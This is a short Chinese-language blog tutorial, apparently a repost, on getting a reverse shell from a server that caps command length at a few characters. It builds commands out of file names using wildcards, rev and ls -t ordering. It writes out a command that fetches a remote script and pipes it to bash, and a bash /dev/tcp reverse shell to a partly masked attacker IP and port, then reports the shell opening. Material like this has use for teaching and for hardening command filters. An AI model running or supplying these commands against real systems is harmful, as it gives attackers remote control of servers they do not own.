限制命令长度如何反弹shell

问题:限制命令在7句以内如何反弹shell

先来看一个命令

直接输入一个*,发现输出了hello_qf.来看一下如何实现

限制命令长度如何反弹shell_第1张图片

在一个新的目录中,我们输入这样的命令就可以输出hello_qf了。因为输入*就是echo hello_qf

于是输出了hello_qf.

那我们再来看一下使用命令ls -l

有两个方法:

方法一:

利用rev把字符串反过来。

rev作用:把字符串头变成尾,尾变成头翻转

test的内容

this is test

开始操作:

限制命令长度如何反弹shell_第2张图片

>dir原因

把 a 和 b 写到 c 里面

dir a b>c

执行了*>v,就是

dir l- sl > v

>v使用字母v的原因

*v>x就是

rev v

方法二:

待会使用反弹shell就是用这个方法,利用ls -t 的时间顺序来实现执行命令

限制命令长度如何反弹shell_第3张图片

反弹shell:

首先要确立一个反弹shell的语句,因为我们要设置为这个文件名,所以要尽量简单,而且尽量少有那种奇怪的符号。于是确立这个语句:

curl ip/shell.txt|bash

shell.txt的内容就是反弹shell

bash -i >& /dev/tcp/47.xxx.xxx.51/2333 0>&1

但是这里面有一个'/'要避免,那我们就把这个shell.txt设置成默认页面,然后命令变成:

curl ip|bash

限制命令长度如何反弹shell_第4张图片

 

以上是命令

到服务器看一眼:

限制命令长度如何反弹shell_第5张图片

成功反弹shell

你可能感兴趣的:(linux,web安全,安全)